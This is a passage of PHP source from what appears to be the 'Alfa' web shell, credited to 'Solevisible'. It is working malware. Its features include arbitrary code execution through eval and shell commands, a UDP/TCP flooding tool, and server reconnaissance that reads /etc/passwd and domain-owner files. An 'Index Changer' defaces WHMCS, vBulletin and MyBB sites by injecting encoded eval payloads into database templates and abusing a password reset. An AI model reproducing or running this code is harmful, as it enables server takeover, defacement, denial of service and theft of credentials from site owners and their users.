3839. list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'"));
3840. $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'"));
3841. $image_info['mime'] = $mime[1];
3842. }
3843. else
3844. {
3845. $source = __ZW5jb2Rlcg(__read_file($file, false));
3846. }
3847. $image_info_h = "Image type = <span>[</span> " . $image_info['mime'] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>";
3848. if ($width > 800)
3849. {
3850. $width = 800;
3851. }
3852. echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info['mime'] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>";
3853. }
3854. break;
3855. }
3856. echo '</div>';
3857. alfaFooter();
3858. }
3859. function findicon($file, $type)
3860. {
3861. $s = 'http://solevisible.com/icons/';
3862. $types = array(
3863. 'json',
3864. 'ppt',
3865. 'pptx',
3866. 'xls',
3867. 'xlsx',
3868. 'msi',
3869. 'config',
3870. 'cgi',
3871. 'pm',
3872. 'c',
3873. 'cpp',
3874. 'cs',
3875. 'java',
3876. 'aspx',
3877. 'asp',
3878. 'db',
3879. 'ttf',
3880. 'eot',
3881. 'woff',
3882. 'woff2',
3883. 'woff',
3884. 'conf',
3885. 'log',
3886. 'apk',
3887. 'cab',
3888. 'bz2',
3889. 'tgz',
3890. 'dmg',
3891. 'izo',
3892. 'jar',
3893. '7z',
3894. 'iso',
3895. 'rar',
3896. 'bat',
3897. 'sh',
3898. 'alfa',
3899. 'gz',
3900. 'tar',
3901. 'php',
3902. 'php4',
3903. 'php5',
3904. 'phtml',
3905. 'html',
3906. 'xhtml',
3907. 'shtml',
3908. 'htm',
3909. 'zip',
3910. 'png',
3911. 'jpg',
3912. 'jpeg',
3913. 'gif',
3914. 'bmp',
3915. 'ico',
3916. 'txt',
3917. 'js',
3918. 'rb',
3919. 'py',
3920. 'xml',
3921. 'css',
3922. 'sql',
3923. 'htaccess',
3924. 'pl',
3925. 'ini',
3926. 'dll',
3927. 'exe',
3928. 'mp3',
3929. 'mp4',
3930. 'm4a',
3931. 'mov',
3932. 'flv',
3933. 'swf',
3934. 'mkv',
3935. 'avi',
3936. 'wmv',
3937. 'mpg',
3938. 'mpeg',
3939. 'dat',
3940. 'pdf',
3941. '3gp',
3942. 'doc',
3943. 'docx',
3944. 'docm'
3945. );
3946. if ($type != 'file')
3947. {
3948. return ($file == '..' ? $s . 'back.png' : $s . 'folder.png');
3949. }
3950. else
3951. {
3952. $ext = explode('.', $file);
3953. $ext = end($ext);
3954. $ext = strtolower($ext);
3955. return (in_array($ext, $types) ? $s . $ext . '.png' : $s . 'notfound.png');
3956. }
3957. }
3958. function alfadlfile()
3959. {
3960. if (isset($_POST['c'], $_POST['file']))
3961. {
3962. $basename = rawurldecode(basename($_POST['file']));
3963. $_POST['file'] = str_replace("//", "/", $_POST['c'] . '/' . $basename);
3964. $alfa_canruncmd = _alfa_can_runCommand(true, true);
3965. if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd)
3966. {
3967. ob_start("ob_gzhandler", 4096);
3968. header("Content-Disposition: attachment; filename=\"" . addslashes($basename) . "\"");
3969. header("Content-Type: application/octet-stream");
3970. if (isset($GLOBALS["glob_chdir_false"]))
3971. {
3972. $randname = $basename . rand(111, 9999);
3973. $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3974. $filepath = $scriptpath . "/" . $randname;
3975. if (_alfa_is_writable($scriptpath))
3976. {
3977. alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'");
3978. readfile($filepath);
3979. @unlink($filepath);
3980. }
3981. else
3982. {
3983. alfaEx("cat '" . addslashes($_POST["file"]) . "'");
3984. }
3985. }
3986. else
3987. {
3988. readfile($_POST['file']);
3989. }
3990. }
3991. else echo ('Error...!');
3992. }
3993. }
3994. function alfaphpeval()
3995. {
3996. alfahead();
3997. if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini'))
3998. {
3999. echo '<div class=header>';
4000. ob_start();
4001. $INI = ini_get_all();
4002. print '<table border=0><tr>' . '<td class="listing"><font class="highlight_txt">Param</td>' . '<td class="listing"><font class="highlight_txt">Global value</td>' . '<td class="listing"><font class="highlight_txt">Local Value</td>' . '<td class="listing"><font class="highlight_txt">Access</td></tr>';
4003. foreach ($INI as $param => $values) print "\n" . '<tr>' . '<td class="listing"><b>' . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
4004. $tmp = ob_get_clean();
4005. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
4006. $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
4007. echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
4008. }
4009. if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info'))
4010. {
4011. echo '<div class=header><style>.p {color:#000;}</style>';
4012. ob_start();
4013. phpinfo();
4014. $tmp = ob_get_clean();
4015. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
4016. $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
4017. echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
4018. }
4019. if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten'))
4020. {
4021. echo '<div class=header>';
4022. ob_start();
4023. $EXT = get_loaded_extensions();
4024. echo '<table border=0><tr><td class="listing">' . implode('</td></tr>' . "\n" . '<tr><td class="listing">', $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
4025. echo '</div><br>';
4026. }
4027. $lang_html = "";
4028. foreach (array(
4029. "php" => "php ~> [ Windows / Linux ]",
4030. "perl" => "perl ~> [ Linux ]",
4031. "python" => "python ~> [ Linux ]",
4032. "bash" => "bash ~> [ Linux ]"
4033. ) as $key => $val)
4034. {
4035. $lang_html .= '<option value="' . $key . '" ' . ($_POST["alfa3"] == $key ? "selected" : "") . '>' . $val . '</option>';
4036. }
4037. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">' . $lang_html . '</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>' . (!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : '') . '</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
4038. echo '</form><pre id=PhpOutput style="' . (empty($_POST['alfa1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
4039. if (!empty($_POST['alfa1']))
4040. {
4041. if ($_POST['alfa3'] == "php")
4042. {
4043. ob_start();
4044. eval($_POST['alfa1']);
4045. $result = htmlspecialchars(ob_get_clean());
4046. }
4047. elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix")
4048. {
4049. if (isset($_SESSION["eval_tmpdir"]))
4050. {
4051. $tempdir = $_SESSION["eval_tmpdir"];
4052. }
4053. else
4054. {
4055. $tempdir = dirname(alfaEx("mktemp"));
4056. $_SESSION["eval_tmpdir"] = $tempdir;
4057. }
4058. $lang = $_POST['alfa3'];
4059. $filename = "temp" . rand(11111, 99999);
4060. $temp = $tempdir . "/" . $filename;
4061. __write_file($filename, $_POST['alfa1']);
4062. $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
4063. @unlink($filename);
4064. @unlink($temp);
4065. }
4066. echo '<textarea class=bigarea id="PhpCode">' . $result . '</textarea>';
4067. }
4068. echo '</pre></div>';
4069. alfafooter();
4070. }
4071. function alfahash()
4072. {
4073. if (!function_exists('hex2bin'))
4074. {
4075. function hex2bin($p)
4076. {
4077. return decbin(hexdec($p));
4078. }
4079. }
4080. if (!function_exists('full_urlencode'))
4081. {
4082. function full_urlencode($p)
4083. {
4084. $r = '';
4085. for ($i = 0;$i < strlen($p);++$i) $r .= '%' . dechex(ord($p[$i]));
4086. return strtoupper($r);
4087. }
4088. }
4089. $stringTools = array(
4090. 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
4091. 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
4092. 'strrev ( $string )' => 'strrev($s)',
4093. 'bin2hex ( $string )' => 'bin2hex($s)',
4094. 'hex2bin ( $string )' => 'hex2bin($s)',
4095. 'md5 ( $string )' => 'md5($s)',
4096. 'sha1 ( $string )' => 'sha1($s)',
4097. 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
4098. 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
4099. 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
4100. 'crypt ( $string )' => 'crypt($s)',
4101. 'crc32 ( $string )' => 'crc32($s)',
4102. 'str_rot13 ( $string )' => 'str_rot13($s)',
4103. 'urlencode ( $string )' => 'urlencode($s)',
4104. 'urldecode ( $string )' => 'urldecode($s)',
4105. 'full_urlencode ( $string )' => 'full_urlencode($s)',
4106. 'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
4107. 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
4108. 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
4109. 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
4110. 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
4111. 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
4112. 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
4113. );
4114. alfahead();
4115. echo '<div class=header>';
4116. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
4117. foreach ($stringTools as $k => $v) echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST['alfa1'] == $v ? 'selected' : '') . ">" . $k . "</option>";
4118. echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST['alfa1']) ? '' : htmlspecialchars(@$_POST['alfa2'])) . "</textarea></form>";
4119. if (!empty($_POST['alfa1']))
4120. {
4121. $string = addslashes($_POST['alfa2']);
4122. $string = str_replace('\"', '"', $string);
4123. $alg = $_POST['alfa1'];
4124. $code = str_replace('$s', "'" . $string . "'", $alg);
4125. ob_start();
4126. eval('echo ' . $code . ';');
4127. $res = ob_get_contents();
4128. ob_end_clean();
4129. if (in_array($alg, $stringTools)) echo '<textarea class="bigarea" id="PhpCode">' . htmlspecialchars($res) . '</textarea>';
4130. }
4131. echo "</div>";
4132. alfaFooter();
4133. }
4134. function alfados()
4135. {
4136. alfahead();
4137. echo '<div class=header>';
4138. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
4139. if (!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3']))
4140. {
4141. echo __pre();
4142. $packets = 0;
4143. ignore_user_abort(true);
4144. $exec_time = (int)$_POST['alfa2'];
4145. $time = time();
4146. $max_time = $exec_time + $time;
4147. $host = $_POST['alfa1'];
4148. $port = (int)$_POST['alfa3'];
4149. $method = $_POST['alfa4'];
4150. $out = str_repeat('X', 65000);
4151. while (1)
4152. {
4153. $packets++;
4154. if (time() > $max_time)
4155. {
4156. break;
4157. }
4158. $fp = @fsockopen($method . '://' . $host, $port, $errno, $errstr, 5);
4159. if ($fp)
4160. {
4161. fwrite($fp, $out);
4162. fclose($fp);
4163. }
4164. }
4165. echo "<center>$packets (" . @round(($packets * 65) / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>";
4166. echo "</pre>";
4167. }
4168. echo '</div>';
4169. alfafooter();
4170. }
4171. function __pre()
4172. {
4173. return ('<pre id="strOutput" style="margin-top:5px" class="ml1">');
4174. }
4175. function alfaIndexChanger()
4176. {
4177. alfahead();
4178. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
4179. if (isset($_POST['alfa3']) && ($_POST['alfa3'] == 'whmcs'))
4180. {
4181. echo __pre();
4182. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
4183. <p><center>" . getConfigHtml('whmcs') . "<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
4184. ";
4185. $table = array(
4186. 'td1' => array(
4187. 'color' => 'FFFFFF',
4188. 'tdName' => 'Mysql Host',
4189. 'inputName' => 'dbh',
4190. 'id' => 'db_host',
4191. 'inputValue' => 'localhost',
4192. 'inputSize' => '50'
4193. ) ,
4194. 'td2' => array(
4195. 'color' => 'FFFFFF',
4196. 'tdName' => 'URL',
4197. 'inputName' => 'path',
4198. 'inputValue' => 'http://site.com/whmcs',
4199. 'inputSize' => '50'
4200. ) ,
4201. 'td3' => array(
4202. 'color' => 'FFFFFF',
4203. 'tdName' => 'File Name',
4204. 'inputName' => 'fname',
4205. 'inputValue' => '',
4206. 'inputSize' => '50'
4207. ) ,
4208. 'td4' => array(
4209. 'color' => 'FFFFFF',
4210. 'tdName' => 'Db Name',
4211. 'inputName' => 'dbn',
4212. 'id' => 'db_name',
4213. 'inputValue' => '',
4214. 'inputSize' => '50'
4215. ) ,
4216. 'td5' => array(
4217. 'color' => 'FFFFFF',
4218. 'tdName' => 'Db User',
4219. 'inputName' => 'dbu',
4220. 'id' => 'db_user',
4221. 'inputValue' => '',
4222. 'inputSize' => '50'
4223. ) ,
4224. 'td6' => array(
4225. 'color' => 'FFFFFF',
4226. 'tdName' => 'Db Pass',
4227. 'inputName' => 'dbp',
4228. 'id' => 'db_pw',
4229. 'inputValue' => '',
4230. 'inputSize' => '50'
4231. )
4232. );
4233. create_table($table);
4234. echo "<br><div class='txtfont'>| Your Index |</div><br>
4235. <textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4236. <input type='submit' value=' '>
4237. </form></center></center>";
4238. if (isset($_POST['alfa6']))
4239. {
4240. $s0levisible = "Powered By Solevisible";
4241. $dbu = $_POST['alfa6'];
4242. $path = $_POST['alfa5'];
4243. $fname = $_POST['alfa4'];
4244. $dbn = $_POST['alfa7'];
4245. $dbp = $_POST['alfa8'];
4246. $dbh = $_POST['alfa9'];
4247. $index = $_POST['alfa10'];
4248. $index = str_replace("\'", "'", $index);
4249. $deface = '$x = base64_decode("' . __ZW5jb2Rlcg($index) . '"); $solevisible = fopen("' . $fname . '","w"); fwrite($solevisible,$x);';
4250. $saveData = __ZW5jb2Rlcg($deface);
4251. $Def = '{php}eval(base64_decode("' . $saveData . '"));{/php}';
4252. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
4253. {
4254. $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
4255. $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
4256. $soleGet = mysqli_fetch_assoc($soleSave);
4257. $tempSave1 = $soleGet['message'];
4258. $tempSave = str_replace("'", "\'", $tempSave1);
4259. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
4260. $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn));
4261. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
4262. $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn));
4263. if (function_exists('curl_version'))
4264. {
4265. $AlfaSole = new AlfaCURL(true);
4266. $saveurl = $AlfaSole->Send($path . "/pwreset.php");
4267. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
4268. $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
4269. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
4270. $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
4271. __alert('File Created...');
4272. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>";
4273. }
4274. else
4275. {
4276. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" " . $path . "/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" " . $path . "/" . $fname . " \"</font></b></center><br><br>";
4277. }
4278. }
4279. }
4280. }
4281. if (isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb'))
4282. {
4283. echo __pre();
4284. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
4285. <p><center>" . getConfigHtml('vb') . "<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
4286. ";
4287. $table = array(
4288. 'td1' => array(
4289. 'color' => 'FFFFFF',
4290. 'tdName' => 'Mysql Host',
4291. 'inputName' => 'dbh',
4292. 'id' => 'db_host',
4293. 'inputValue' => 'localhost',
4294. 'inputSize' => '50'
4295. ) ,
4296. 'td2' => array(
4297. 'color' => 'FFFFFF',
4298. 'tdName' => 'Db Name',
4299. 'inputName' => 'dbn',
4300. 'id' => 'db_name',
4301. 'inputValue' => '',
4302. 'inputSize' => '50'
4303. ) ,
4304. 'td3' => array(
4305. 'color' => 'FFFFFF',
4306. 'tdName' => 'Db User',
4307. 'inputName' => 'dbu',
4308. 'id' => 'db_user',
4309. 'inputValue' => '',
4310. 'inputSize' => '50'
4311. ) ,
4312. 'td4' => array(
4313. 'color' => 'FFFFFF',
4314. 'tdName' => 'Db Pass',
4315. 'inputName' => 'dbp',
4316. 'id' => 'db_pw',
4317. 'inputValue' => '',
4318. 'inputSize' => '50'
4319. ) ,
4320. 'td5' => array(
4321. 'color' => 'FFFFFF',
4322. 'tdName' => 'Prefix',
4323. 'inputName' => 'prefix',
4324. 'id' => 'db_prefix',
4325. 'inputValue' => '',
4326. 'inputSize' => '50'
4327. )
4328. );
4329. create_table($table);
4330. echo "<br><div class='txtfont'>| Your Index |</div><br>
4331. <textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4332. <input type='submit' value=' '></form></center></center>";
4333. if ($_POST['alfa8'] == '>>')
4334. {
4335. $s0levisible = "Powered By Solevisible";
4336. $dbu = $_POST['alfa2'];
4337. $dbn = $_POST['alfa3'];
4338. $dbp = $_POST['alfa4'];
4339. $dbh = $_POST['alfa5'];
4340. $index = $_POST['alfa6'];
4341. $prefix = $_POST['alfa7'];
4342. $index = str_replace("\'", "'", $index);
4343. $set_index = "{\${eval(base64_decode(\'";
4344. $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
4345. $set_index .= "\'))}}{\${exit()}}";
4346. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
4347. {
4348. $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
4349. $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='spacer_open'";
4350. $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='FORUMHOME'";
4351. $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . "" . $s0levisible . "', stylevars='', csscolors='', editorstyles=''";
4352. @mysqli_query($conn, $loli1) or die(mysqli_error($conn));
4353. @mysqli_query($conn, $loli2) or die(mysqli_error($conn));
4354. @mysqli_query($conn, $loli3) or die(mysqli_error($conn));
4355. __alert('VB index changed...!');
4356. }
4357. }
4358. }
4359. if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb'))
4360. {
4361. echo __pre();
4362. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
4363. <p><center>" . getConfigHtml('mybb') . "<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
4364. ";
4365. $table = array(
4366. 'td1' => array(
4367. 'color' => 'FFFFFF',
4368. 'tdName' => 'Mysql Host',
4369. 'inputName' => 'mybbdbh',
4370. 'id' => 'db_host',
4371. 'inputValue' => 'localhost',
4372. 'inputSize' => '50'
4373. ) ,
4374. 'td2' => array(
4375. 'color' => 'FFFFFF',
4376. 'tdName' => 'Db Name',
4377. 'inputName' => 'mybbdbn',
4378. 'id' => 'db_name',
4379. 'inputValue' => '',
4380. 'inputSize' => '50'
4381. ) ,
4382. 'td3' => array(
4383. 'color' => 'FFFFFF',
4384. 'tdName' => 'Db User',
4385. 'inputName' => 'mybbdbu',
4386. 'id' => 'db_user',
4387. 'inputValue' => '',
4388. 'inputSize' => '50'
4389. ) ,
4390. 'td4' => array(
4391. 'color' => 'FFFFFF',
4392. 'tdName' => 'Db Pass',
4393. 'inputName' => 'mybbdbp',
4394. 'id' => 'db_pw',
4395. 'inputValue' => '',
4396. 'inputSize' => '50'
4397. )
4398. );
4399. create_table($table);
4400. echo "<br><div class='txtfont'>| Your Index |</div><br>
4401. <textarea name=mybbindex rows='19' cols='103'>
4402. <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
4403. if (isset($_POST['alfa6']))
4404. {
4405. $mybb_dbh = $_POST['alfa6'];
4406. $mybb_dbu = $_POST['alfa7'];
4407. $mybb_dbn = $_POST['alfa8'];
4408. $mybb_dbp = $_POST['alfa9'];
4409. $mybb_index = $_POST['alfa10'];
4410. if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
4411. {
4412. $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn));
4413. $prefix = "mybb_";
4414. $loli7 = "UPDATE " . $prefix . "templates SET template='" . $mybb_index . "' WHERE title='index'";
4415. $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn));
4416. __alert('MyBB index changed...!');
4417. }
4418. }
4419. }
4420. echo "</div>";
4421. alfafooter();
4422. }
4423. function alfaproc()
4424. {
4425. alfahead();
4426. echo "<Div class=header><br><center>";
4427. if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
4428. if ($GLOBALS['sys'] == "win")
4429. {
4430. $process = array(
4431. "Task List" => "tasklist /V",
4432. "System Info" => "systeminfo",
4433. "Active Connections" => "netstat -an",
4434. "Running Services" => "net start",
4435. "User Accounts" => "net user",
4436. "Show Computers" => "net view",
4437. "ARP Table" => "arp -a",
4438. "IP Configuration" => "ipconfig /all"
4439. );
4440. }
4441. else
4442. {
4443. $process = array(
4444. "Process status" => "ps aux",
4445. "Syslog" => "cat /etc/syslog.conf",
4446. "Resolv" => "cat /etc/resolv.conf",
4447. "Hosts" => "cat /etc/hosts",
4448. "Cpuinfo" => "cat /proc/cpuinfo",
4449. "Version" => "cat /proc/version",
4450. "Sbin" => "ls -al /usr/sbin",
4451. "Interrupts" => "cat /proc/interrupts",
4452. "lsattr" => "lsattr -va",
4453. "Uptime" => "uptime",
4454. "Fstab" => "cat /etc/fstab"
4455. );
4456. }
4457. foreach ($process as $n => $link)
4458. {
4459. echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
4460. }
4461. echo "</center><br>";
4462. if (!empty($_POST['alfa1']))
4463. {
4464. echo "<pre class='ml1' style='margin-top:5px' >";
4465. if (isset($GLOBALS["glob_chdir_false"]) && !empty($_POST["c"]))
4466. {
4467. $cmd = "cd '" . addslashes($_POST["c"]) . "';";
4468. }
4469. echo alfaEx($cmd . $_POST['alfa1']);
4470. echo '</pre>';
4471. }
4472. echo "</div>";
4473. alfafooter();
4474. }
4475. function alfasafe()
4476. {
4477. alfahead();
4478. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
4479. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
4480. if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains')
4481. {
4482. if (!_alfa_file_exists("/etc/virtual/domainowners"))
4483. {
4484. echo __pre();
4485. $solevisible9 = _alfa_file('/etc/named.conf');
4486. if (is_array($solevisible9))
4487. {
4488. foreach ($solevisible9 as $solevisible13)
4489. {
4490. if (@eregi('zone', $solevisible13))
4491. {
4492. preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
4493. if (strlen(trim($solevisible14[1][0])) > 2)
4494. {
4495. echo $solevisible14[1][0] . '<br>';
4496. }
4497. }
4498. }
4499. }
4500. }
4501. else
4502. {
4503. echo __pre();
4504. $users = _alfa_file("/etc/virtual/domainowners");
4505. if (is_array($users))
4506. {
4507. foreach ($users as $boz)
4508. {
4509. $dom = explode(":", $boz);
4510. echo $dom[0] . "\n";
4511. }
4512. }
4513. }
4514. }
4515. if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases')
4516. {
4517. echo '
4518. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
4519. if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>')
4520. {
4521. if (!_alfa_file_exists("/etc/virtual/domainowners"))
4522. {
4523. $site = trim($_POST['alfa7']);
4524. $rep = str_replace(array(
4525. "https://",
4526. "http://",
4527. "www."
4528. ) , "", $site);
4529. $user = "";
4530. if (function_exists("posix_getpwuid") && function_exists("fileowner"))
4531. {
4532. if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}")))
4533. {
4534. $user = $user['name'];
4535. }
4536. }
4537. else
4538. {
4539. if (_alfa_can_runCommand(true, true))
4540. {
4541. $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep);
4542. }
4543. }
4544. if (!empty($user) && $user != 'root')
4545. {
4546. echo __pre() . "<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
4547. }
4548. else
4549. {
4550. echo __pre() . '<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
4551. }
4552. }
4553. else
4554. {
4555. $site = trim($_POST['alfa7']);
4556. $rep = str_replace(array(
4557. "https://",
4558. "http://",
4559. "www."
4560. ) , "", $site);
4561. $users = _alfa_file("/etc/virtual/domainowners");
4562. foreach ($users as $boz)
4563. {
4564. $ex = explode(":", $boz);
4565. if ($ex[0] == $rep)
4566. {
4567. echo __pre() . "<center><table border='1'>
4568. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">" . trim($ex[1]) . "</font></b></td></tr>
4569. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
4570. break;
4571. }
4572. }
4573. }
4574. }
4575. }
4576. if (!empty($_POST['alfa5']) && isset($_POST['alfa5']))
4577. {
